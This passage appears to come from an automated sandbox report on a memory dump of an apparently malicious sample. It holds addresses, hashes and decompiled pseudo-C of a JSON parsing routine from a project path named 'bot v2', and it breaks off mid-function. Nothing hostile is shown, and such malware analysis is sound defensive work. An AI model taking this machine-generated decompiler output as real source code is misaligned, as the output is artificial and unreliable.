0x0042801a
0x0042801b
0x0042801c
0x0042801f
0x00428028
0x00428028
0x0042802b
0x00428061
0x0042802d
0x0042802d
0x0042802d
0x00428030
0x00428047
0x00428047
0x00428030
0x00428066
0x00428070
0x0042807c
0x00427f3a
0x00427f3a
0x00427f3f
0x00427f40
0x00427f7a
0x00427f81
0x00427fc5
0x00427fc5
0x00427fcc
0x00427fdb
0x00427fde
0x00427fea
0x00427fea
0x00427f2c
0x00427f0e
0x00000000
0x00000000
0x00000000
0x00427edd

APIs

___AdjustPointer.LIBCMT ref: 00427F7A
___AdjustPointer.LIBCMT ref: 00427F9D
___AdjustPointer.LIBCMT ref: 00428039

Strings

4RB, xrefs: 00427F12

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AdjustPointer
String ID: 4RB
API String ID: 1740715915-3430714164
Opcode ID: 70d471ae16cd72a0dd5db683303a133983da3d1dd5c10b913de7680e5cd620f5
Instruction ID: 7275e2e71b832a2f7f9fe1e0cb1f48dcd8c5ff0aee5f384ec1b4c9b6d3ce25ba
Opcode Fuzzy Hash: 70d471ae16cd72a0dd5db683303a133983da3d1dd5c10b913de7680e5cd620f5
Instruction Fuzzy Hash: 6451EF7170D226AFDB288F51E941BABB7A4EF04304FA6452FE90587291E739EC40D798

Uniqueness

Uniqueness Score: -1.00%

Function 0041268A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041268A(void* __ebx, void* __edi, void* __esi, long long __fp0) {
				signed char _t463;
				void* _t464;
				signed char _t465;
				signed char _t466;
				signed char _t469;
				void* _t470;
				intOrPtr _t492;
				signed char _t494;
				signed char _t579;
				void* _t626;
				signed char _t647;
				void* _t656;
				void* _t887;
				void* _t888;
				signed int _t889;
				void* _t891;
				void* _t893;
				long long _t908;

				L0:
				while(1) {
					L0:
					_t908 = __fp0;
					_t888 = __esi;
					_t887 = __edi;
					_t656 = __ebx;
					E004200C0( *(_t889 - 0x2a8) + 0x30);
					 *((long long*)(_t889 - 0x424)) = _t908;
					asm("movsd xmm0, [ebp-0x424]");
					asm("movsd [esp], xmm0");
					_t463 = E00411E30( *(_t889 - 0x2a8) + 0x30);
					_t893 = _t891 - 8 + 8;
					if((_t463 & 0x000000ff) == 0) {
						break;
					}
					L26:
					_t464 = E00420170( *(_t889 - 0x2a8) + 0x30);
					_t893 = _t893 - 8;
					asm("movsd xmm0, [ebp-0x424]");
					asm("movsd [esp], xmm0");
					_t465 = E004216F0( *((intOrPtr*)(_t889 + 8)), _t464);
					__eflags = _t465 & 0x000000ff;
					if((_t465 & 0x000000ff) != 0) {
						L28:
						while(1) {
							L49:
							while(1) {
								L51:
								_t466 = E0041EDD0(_t889 - 0x2bc);
								_t850 = _t466 & 0x000000ff;
								__eflags = _t466 & 0x000000ff;
								if(__eflags != 0) {
									break;
								}
								L53:
								_t469 = E004172F0(E0041ACC0(_t889 - 0x2bc, _t889 - 0x44c), __eflags);
								__eflags = _t469 & 0x000000ff;
								if((_t469 & 0x000000ff) == 0) {
									L63:
									_t470 = E00420190( *(_t889 - 0x2a8));
									__eflags = _t470 - 0xd;
									if(_t470 != 0xd) {
										L71:
										__eflags =  *( *(_t889 - 0x2a8) + 0x28) - 0xb;
										if(__eflags != 0) {
											L77:
											 *((intOrPtr*)(_t889 - 0x38c)) = E00414FA0(_t889 - 0x4bc, 0);
											E00415310(_t889 - 0xc4, __eflags, "object");
											 *((intOrPtr*)(_t889 - 0x390)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x2a4, 0xb, _t889 - 0xc4);
											 *((intOrPtr*)(_t889 - 0x388)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x394)) = E00420140( *((intOrPtr*)(_t889 - 0x388)), _t889 - 0x504);
											 *(_t889 - 0x3a0) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x6a4, 0x65,  *((intOrPtr*)(_t889 - 0x394)),  *((intOrPtr*)(_t889 - 0x390)),  *((intOrPtr*)(_t889 - 0x38c)));
											 *((intOrPtr*)(_t889 - 0x398)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x3a4)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x398)), _t887, _t888, _t889 - 0x28c);
											 *((intOrPtr*)(_t889 - 0x39c)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x3a8)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x39c)), _t889 - 0x510));
											_t850 =  *(_t889 - 0x3a0);
											 *((char*)(_t889 - 0x2d5)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x3a8)),  *((intOrPtr*)(_t889 - 0x3a4)),  *(_t889 - 0x3a0));
											E00416980(_t889 - 0x28c);
											E00416D90(_t889 - 0x6a4);
											E00416980(_t889 - 0x2a4);
											E00416980(_t889 - 0xc4);
											E00416950(_t889 - 0x4bc);
											E00416CE0(_t889 - 0x2bc);
											_t492 =  *((intOrPtr*)(_t889 - 0x2d5));
										} else {
											L72:
											_t494 = E0041F190(_t656,  *((intOrPtr*)(_t889 + 8)), _t887, _t888, __eflags);
											_t850 = _t494 & 0x000000ff;
											__eflags = _t494 & 0x000000ff;
											if((_t494 & 0x000000ff) != 0) {
												L74:
												__eflags = E0041EDD0(_t889 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2ba1);
													E00430DB7(_t656, _t850, _t887, _t888, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t893 = _t893 + 0xc;
												}
												E00421D70(_t889 - 0x2bc, __eflags);
												 *(_t889 - 0x2a9) = 1;
												goto L1;
											} else {
												L73:
												 *((char*)(_t889 - 0x2d4)) = 0;
												E00416CE0(_t889 - 0x2bc);
												_t492 =  *((intOrPtr*)(_t889 - 0x2d4));
											}
										}
									} else {
										L64:
										__eflags = E00420190( *(_t889 - 0x2a8)) - 4;
										if(__eflags == 0) {
											L66:
											_t579 = E00420D60( *((intOrPtr*)(_t889 + 8)), __eflags, E00420170( *(_t889 - 0x2a8) + 0x30));
											__eflags = _t579 & 0x000000ff;
											if((_t579 & 0x000000ff) != 0) {
												L68:
												__eflags = E00420190( *(_t889 - 0x2a8)) - 0xc;
												if(__eflags == 0) {
													L70:
													E00420190( *(_t889 - 0x2a8));
													goto L1;
												} else {
													L69:
													 *((intOrPtr*)(_t889 - 0x368)) = E00414FA0(_t889 - 0x4ac, 0);
													E00415310(_t889 - 0xac, __eflags, "object separator");
													 *((intOrPtr*)(_t889 - 0x36c)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x274, 0xc, _t889 - 0xac);
													 *((intOrPtr*)(_t889 - 0x364)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x370)) = E00420140( *((intOrPtr*)(_t889 - 0x364)), _t889 - 0x4ec);
													 *((intOrPtr*)(_t889 - 0x37c)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x684, 0x65,  *((intOrPtr*)(_t889 - 0x370)),  *((intOrPtr*)(_t889 - 0x36c)),  *((intOrPtr*)(_t889 - 0x368)));
													 *((intOrPtr*)(_t889 - 0x374)) =  *(_t889 - 0x2a8) + 0x30;
													 *(_t889 - 0x380) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x374)), _t887, _t888, _t889 - 0x25c);
													 *((intOrPtr*)(_t889 - 0x378)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x384)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x378)), _t889 - 0x4f8));
													_t850 =  *(_t889 - 0x380);
													 *((char*)(_t889 - 0x2d3)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x384)),  *(_t889 - 0x380),  *((intOrPtr*)(_t889 - 0x37c)));
													E00416980(_t889 - 0x25c);
													E00416D90(_t889 - 0x684);
													E00416980(_t889 - 0x274);
													E00416980(_t889 - 0xac);
													E00416950(_t889 - 0x4ac);
													E00416CE0(_t889 - 0x2bc);
													_t492 =  *((intOrPtr*)(_t889 - 0x2d3));
												}
											} else {
												L67:
												 *((char*)(_t889 - 0x2d2)) = 0;
												E00416CE0(_t889 - 0x2bc);
												_t492 =  *((intOrPtr*)(_t889 - 0x2d2));
											}
										} else {
											L65:
											 *((intOrPtr*)(_t889 - 0x344)) = E00414FA0(_t889 - 0x49c, 0);
											E00415310(_t889 - 0x94, __eflags, "object key");
											 *((intOrPtr*)(_t889 - 0x348)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x244, 4, _t889 - 0x94);
											 *((intOrPtr*)(_t889 - 0x340)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x34c)) = E00420140( *((intOrPtr*)(_t889 - 0x340)), _t889 - 0x4d4);
											 *((intOrPtr*)(_t889 - 0x358)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x664, 0x65,  *((intOrPtr*)(_t889 - 0x34c)),  *((intOrPtr*)(_t889 - 0x348)),  *((intOrPtr*)(_t889 - 0x344)));
											 *((intOrPtr*)(_t889 - 0x350)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x35c)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x350)), _t887, _t888, _t889 - 0x22c);
											 *((intOrPtr*)(_t889 - 0x354)) =  *(_t889 - 0x2a8) + 0x30;
											 *(_t889 - 0x360) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x354)), _t889 - 0x4e0));
											_t850 =  *(_t889 - 0x360);
											 *((char*)(_t889 - 0x2d1)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *(_t889 - 0x360),  *((intOrPtr*)(_t889 - 0x35c)),  *((intOrPtr*)(_t889 - 0x358)));
											E00416980(_t889 - 0x22c);
											E00416D90(_t889 - 0x664);
											E00416980(_t889 - 0x244);
											E00416980(_t889 - 0x94);
											E00416950(_t889 - 0x49c);
											E00416CE0(_t889 - 0x2bc);
											_t492 =  *((intOrPtr*)(_t889 - 0x2d1));
										}
									}
								} else {
									L54:
									_t626 = E00420190( *(_t889 - 0x2a8));
									__eflags = _t626 - 0xd;
									if(_t626 != 0xd) {
										L56:
										_t850 =  *(_t889 - 0x2a8);
										__eflags =  *( *(_t889 - 0x2a8) + 0x28) - 0xa;
										if(__eflags != 0) {
											L62:
											 *((intOrPtr*)(_t889 - 0x320)) = E00414FA0(_t889 - 0x48c, 0);
											E00415310(_t889 - 0x1c, __eflags, "array");
											 *((intOrPtr*)(_t889 - 0x324)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x214, 0xa, _t889 - 0x1c);
											 *((intOrPtr*)(_t889 - 0x31c)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x328)) = E00420140( *((intOrPtr*)(_t889 - 0x31c)), _t889 - 0x588);
											 *((intOrPtr*)(_t889 - 0x334)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x644, 0x65,  *((intOrPtr*)(_t889 - 0x328)),  *((intOrPtr*)(_t889 - 0x324)),  *((intOrPtr*)(_t889 - 0x320)));
											 *((intOrPtr*)(_t889 - 0x32c)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x338)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x32c)), _t887, _t888, _t889 - 0xdc);
											 *((intOrPtr*)(_t889 - 0x330)) =  *(_t889 - 0x2a8) + 0x30;
											 *(_t889 - 0x33c) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x330)), _t889 - 0x4c8));
											_t850 =  *(_t889 - 0x33c);
											 *((char*)(_t889 - 0x2d0)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *(_t889 - 0x33c),  *((intOrPtr*)(_t889 - 0x338)),  *((intOrPtr*)(_t889 - 0x334)));
											E00416980(_t889 - 0xdc);
											E00416D90(_t889 - 0x644);
											E00416980(_t889 - 0x214);
											E00416980(_t889 - 0x1c);
											E00416950(_t889 - 0x48c);
											E00416CE0(_t889 - 0x2bc);
											_t492 =  *((intOrPtr*)(_t889 - 0x2d0));
										} else {
											L57:
											_t647 = E0041F000(_t656,  *((intOrPtr*)(_t889 + 8)), _t887, _t888, __eflags);
											__eflags = _t647 & 0x000000ff;
											if((_t647 & 0x000000ff) != 0) {
												L59:
												__eflags = E0041EDD0(_t889 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2b6b);
													E00430DB7(_t656, _t850, _t887, _t888, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t893 = _t893 + 0xc;
												}
												E00421D70(_t889 - 0x2bc, __eflags);
												 *(_t889 - 0x2a9) = 1;
												goto L1;
											} else {
												L58:
												 *((char*)(_t889 - 0x2cf)) = 0;
												E00416CE0(_t889 - 0x2bc);
												_t492 =  *((intOrPtr*)(_t889 - 0x2cf));
											}
										}
									} else {
										L55:
										E00420190( *(_t889 - 0x2a8));
										L1:
										while(1 != 0) {
											if(( *(_t889 - 0x2a9) & 0x000000ff) != 0) {
												L50:
												 *(_t889 - 0x2a9) = 0;
												goto L51;
											} else {
												L3:
												 *(_t889 - 0x2dc) =  *( *(_t889 - 0x2a8) + 0x28);
												if( *(_t889 - 0x2dc) > 0x10) {
													L48:
													 *((intOrPtr*)(_t889 - 0x2fc)) = E00414FA0(_t889 - 0x47c, 0);
													E00415310(_t889 - 0x7c, __eflags, "value");
													 *((intOrPtr*)(_t889 - 0x300)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x1fc, 0x10, _t889 - 0x7c);
													 *((intOrPtr*)(_t889 - 0x2f8)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x304)) = E00420140( *((intOrPtr*)(_t889 - 0x2f8)), _t889 - 0x570);
													 *(_t889 - 0x310) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x624, 0x65,  *((intOrPtr*)(_t889 - 0x304)),  *((intOrPtr*)(_t889 - 0x300)),  *((intOrPtr*)(_t889 - 0x2fc)));
													 *((intOrPtr*)(_t889 - 0x308)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x314)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x308)), _t887, _t888, _t889 - 0x1e4);
													 *((intOrPtr*)(_t889 - 0x30c)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x318)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x30c)), _t889 - 0x57c));
													_t850 =  *(_t889 - 0x310);
													 *((char*)(_t889 - 0x2cd)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x318)),  *((intOrPtr*)(_t889 - 0x314)),  *(_t889 - 0x310));
													E00416980(_t889 - 0x1e4);
													E00416D90(_t889 - 0x624);
													E00416980(_t889 - 0x1fc);
													E00416980(_t889 - 0x7c);
													E00416950(_t889 - 0x47c);
													E00416CE0(_t889 - 0x2bc);
													_t492 =  *((intOrPtr*)(_t889 - 0x2cd));
												} else {
													L4:
													switch( *((intOrPtr*)( *(_t889 - 0x2dc) * 4 +  &M004133E4))) {
														case 0:
															goto L48;
														case 1:
															L35:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF30( *(__ebp + 8), 1);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L37:
																L49:
																goto L51;
															} else {
																L36:
																 *((char*)(__ebp - 0x2c8)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c8));
															}
															goto L79;
														case 2:
															L29:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF30(__ecx, 0);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L31:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L30:
																 *((char*)(__ebp - 0x2c6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c6));
															}
															goto L79;
														case 3:
															L32:
															__ecx =  *(__ebp + 8);
															E00421690(__ecx) = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L34:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L33:
																 *((char*)(__ebp - 0x2c7)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c7));
															}
															goto L79;
														case 4:
															L41:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420170( *(__ebp - 0x2a8) + 0x30);
															__ecx =  *(__ebp + 8);
															__eax = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L43:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L42:
																 *((char*)(__ebp - 0x2ca)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2ca));
															}
															goto L79;
														case 5:
															L44:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420100( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E00421790( *(__ebp + 8), __eax);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L46:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L45:
																 *((char*)(__ebp - 0x2cb)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2cb));
															}
															goto L79;
														case 6:
															L38:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E004200E0( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E00421740(__ecx, __eax);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L40:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L39:
																 *((char*)(__ebp - 0x2c9)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c9));
															}
															goto L79;
														case 7:
															goto L0;
														case 8:
															L18:
															__ecx =  *(__ebp + 8);
															__eax = E004240A0(__ebx,  *(__ebp + 8), __edi, __esi, __eflags, 0xffffffff);
															__ecx = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L20:
																__ecx =  *(__ebp - 0x2a8);
																__eflags = E00420190( *(__ebp - 0x2a8)) - 0xa;
																if(__eflags != 0) {
																	L24:
																	 *(__ebp - 0x2c3) = 1;
																	__eax = __ebp - 0x2c3;
																	__ecx = __ebp - 0x2bc;
																	__eax = E00422090(__ecx, __ebp - 0x2c3);
																	goto L1;
																} else {
																	L21:
																	__ecx =  *(__ebp + 8);
																	__eax = E0041F000(__ebx, __ecx, __edi, __esi, __eflags);
																	__edx = __al & 0x000000ff;
																	__eflags = __edx;
																	if(__edx != 0) {
																		L23:
																		while(1) {
																			L49:
																			goto L51;
																		}
																	} else {
																		L22:
																		 *((char*)(__ebp - 0x2c2)) = 0;
																		__ecx = __ebp - 0x2bc;
																		__eax = E00416CE0(__ecx);
																		__al =  *((intOrPtr*)(__ebp - 0x2c2));
																	}
																}
															} else {
																L19:
																 *((char*)(__ebp - 0x2d6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2d6));
															}
															goto L79;
														case 9:
															L5:
															_t521 = E004241B0(_t656,  *((intOrPtr*)(_t889 + 8)), _t887, _t888, _t905, 0xffffffff);
															_t850 = _t521 & 0x000000ff;
															if((_t521 & 0x000000ff) != 0) {
																L7:
																__eflags = E00420190( *(_t889 - 0x2a8)) - 0xb;
																if(__eflags != 0) {
																	L11:
																	__eflags =  *( *(_t889 - 0x2a8) + 0x28) - 4;
																	if(__eflags == 0) {
																		L13:
																		_t524 = E00420D60( *((intOrPtr*)(_t889 + 8)), __eflags, E00420170( *(_t889 - 0x2a8) + 0x30));
																		_t850 = _t524 & 0x000000ff;
																		__eflags = _t524 & 0x000000ff;
																		if((_t524 & 0x000000ff) != 0) {
																			L15:
																			__eflags = E00420190( *(_t889 - 0x2a8)) - 0xc;
																			if(__eflags == 0) {
																				L17:
																				 *((char*)(_t889 - 0x2c1)) = 0;
																				E00422090(_t889 - 0x2bc, _t889 - 0x2c1);
																				E00420190( *(_t889 - 0x2a8));
																				goto L1;
																			} else {
																				L16:
																				 *((intOrPtr*)(_t889 - 0x3d4)) = E00414FA0(_t889 - 0x434, 0);
																				E00415310(_t889 - 0x4c, __eflags, "object separator");
																				 *((intOrPtr*)(_t889 - 0x3d8)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x154, 0xc, _t889 - 0x4c);
																				 *((intOrPtr*)(_t889 - 0x3d0)) =  *(_t889 - 0x2a8) + 0x30;
																				 *((intOrPtr*)(_t889 - 0x3dc)) = E00420140( *((intOrPtr*)(_t889 - 0x3d0)), _t889 - 0x534);
																				 *((intOrPtr*)(_t889 - 0x3e8)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x5e4, 0x65,  *((intOrPtr*)(_t889 - 0x3dc)),  *((intOrPtr*)(_t889 - 0x3d8)),  *((intOrPtr*)(_t889 - 0x3d4)));
																				 *((intOrPtr*)(_t889 - 0x3e0)) =  *(_t889 - 0x2a8) + 0x30;
																				 *((intOrPtr*)(_t889 - 0x3ec)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x3e0)), _t887, _t888, _t889 - 0x13c);
																				 *((intOrPtr*)(_t889 - 0x3e4)) =  *(_t889 - 0x2a8) + 0x30;
																				 *(_t889 - 0x3f0) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x3e4)), _t889 - 0x540));
																				_t850 =  *(_t889 - 0x3f0);
																				 *((char*)(_t889 - 0x2c0)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *(_t889 - 0x3f0),  *((intOrPtr*)(_t889 - 0x3ec)),  *((intOrPtr*)(_t889 - 0x3e8)));
																				E00416980(_t889 - 0x13c);
																				E00416D90(_t889 - 0x5e4);
																				E00416980(_t889 - 0x154);
																				E00416980(_t889 - 0x4c);
																				E00416950(_t889 - 0x434);
																				E00416CE0(_t889 - 0x2bc);
																				_t492 =  *((intOrPtr*)(_t889 - 0x2c0));
																			}
																		} else {
																			L14:
																			 *((char*)(_t889 - 0x2bf)) = 0;
																			E00416CE0(_t889 - 0x2bc);
																			_t492 =  *((intOrPtr*)(_t889 - 0x2bf));
																		}
																	} else {
																		L12:
																		 *((intOrPtr*)(_t889 - 0x3b0)) = E00414FA0(_t889 - 0x444, 0);
																		E00415310(_t889 - 0x34, __eflags, "object key");
																		 *((intOrPtr*)(_t889 - 0x3b4)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x124, 4, _t889 - 0x34);
																		 *((intOrPtr*)(_t889 - 0x3ac)) =  *(_t889 - 0x2a8) + 0x30;
																		 *((intOrPtr*)(_t889 - 0x3b8)) = E00420140( *((intOrPtr*)(_t889 - 0x3ac)), _t889 - 0x51c);
																		 *(_t889 - 0x3c4) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x5c4, 0x65,  *((intOrPtr*)(_t889 - 0x3b8)),  *((intOrPtr*)(_t889 - 0x3b4)),  *((intOrPtr*)(_t889 - 0x3b0)));
																		 *((intOrPtr*)(_t889 - 0x3bc)) =  *(_t889 - 0x2a8) + 0x30;
																		 *((intOrPtr*)(_t889 - 0x3c8)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x3bc)), _t887, _t888, _t889 - 0x10c);
																		 *((intOrPtr*)(_t889 - 0x3c0)) =  *(_t889 - 0x2a8) + 0x30;
																		 *((intOrPtr*)(_t889 - 0x3cc)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x3c0)), _t889 - 0x528));
																		_t850 =  *(_t889 - 0x3c4);
																		 *((char*)(_t889 - 0x2be)) = E00412100( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x3cc)),  *((intOrPtr*)(_t889 - 0x3c8)),  *(_t889 - 0x3c4));
																		E00416980(_t889 - 0x10c);
																		E00416D90(_t889 - 0x5c4);
																		E00416980(_t889 - 0x124);
																		E00416980(_t889 - 0x34);
																		E00416950(_t889 - 0x444);
																		E00416CE0(_t889 - 0x2bc);
																		_t492 =  *((intOrPtr*)(_t889 - 0x2be));
																	}
																} else {
																	L8:
																	_t571 = E0041F190(_t656,  *((intOrPtr*)(_t889 + 8)), _t887, _t888, __eflags);
																	__eflags = _t571 & 0x000000ff;
																	if((_t571 & 0x000000ff) != 0) {
																		L10:
																		while(1) {
																			L49:
																			goto L51;
																		}
																	} else {
																		L9:
																		 *((char*)(_t889 - 0x2bd)) = 0;
																		E00416CE0(_t889 - 0x2bc);
																		_t492 =  *((intOrPtr*)(_t889 - 0x2bd));
																	}
																}
															} else {
																L6:
																 *((char*)(_t889 - 0x2d7)) = 0;
																E00416CE0(_t889 - 0x2bc);
																_t492 =  *((intOrPtr*)(_t889 - 0x2d7));
															}
															goto L79;
														case 0xa:
															L47:
															__ecx = __ebp - 0x46c;
															 *(__ebp - 0x418) = E00414FA0(__ebp - 0x46c, 0);
															__ecx = __ebp - 0x64;
															__eax = E00415310(__ebp - 0x64, __eflags, "value");
															__edx = __ebp - 0x64;
															__eax = __ebp - 0x1cc;
															__ecx =  *(__ebp - 0x2a8);
															 *(__ebp - 0x41c) = E0041F5F0(__ebx,  *(__ebp - 0x2a8), __edi, __esi, __eflags, __ebp - 0x1cc, 0, __ebp - 0x64);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x414) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x558;
															__ecx =  *(__ebp - 0x414);
															 *(__ebp - 0x2e0) = E00420140( *(__ebp - 0x414), __ebp - 0x558);
															__eax =  *(__ebp - 0x418);
															__ecx =  *(__ebp - 0x41c);
															__edx =  *(__ebp - 0x2e0);
															__eax = __ebp - 0x604;
															 *(__ebp - 0x2ec) = E0040C460(__ebx, __edi, __esi, __eflags, __ebp - 0x604, 0x65,  *(__ebp - 0x2e0),  *(__ebp - 0x41c),  *(__ebp - 0x418));
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e4) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x1b4;
															__ecx =  *(__ebp - 0x2e4);
															 *(__ebp - 0x2f0) = E004201C0(__ebx,  *(__ebp - 0x2e4), __edi, __esi, __ebp - 0x1b4);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e8) =  *(__ebp - 0x2a8) + 0x30;
															__ecx = __ebp - 0x564;
															__ecx =  *(__ebp - 0x2e8);
															__ecx = E00420140( *(__ebp - 0x2e8), __ebp - 0x564);
															 *(__ebp - 0x2f4) = __eax;
															__edx =  *(__ebp - 0x2ec);
															__eax =  *(__ebp - 0x2f0);
															__ecx =  *(__ebp - 0x2f4);
															__ecx =  *(__ebp + 8);
															__eax = E00412100( *(__ebp + 8),  *(__ebp - 0x2f4),  *(__ebp - 0x2f0),  *(__ebp - 0x2ec));
															 *(__ebp - 0x2cc) = __al;
															__ecx = __ebp - 0x1b4;
															__eax = E00416980(__ebp - 0x1b4);
															__ecx = __ebp - 0x604;
															__eax = E00416D90(__ebp - 0x604);
															__ecx = __ebp - 0x1cc;
															__eax = E00416980(__ebp - 0x1cc);
															__ecx = __ebp - 0x64;
															__eax = E00416980(__ebp - 0x64);
															__ecx = __ebp - 0x46c;
															__eax = E00416950(__ebp - 0x46c);
															__ecx = __ebp - 0x2bc;
															__eax = E00416CE0(__ecx);
															__al =  *(__ebp - 0x2cc);
															goto L79;
													}
												}
											}
											goto L79;
										}
										_t492 = E00416CE0(_t889 - 0x2bc);
									}
								}
								goto L79;
							}
							L52:
							 *((char*)(_t889 - 0x2ce)) = 1;
							E00416CE0(_t889 - 0x2bc);
							_t492 =  *((intOrPtr*)(_t889 - 0x2ce));
							goto L79;
						}
					} else {
						L27:
						 *((char*)(_t889 - 0x2c5)) = 0;
						E00416CE0(_t889 - 0x2bc);
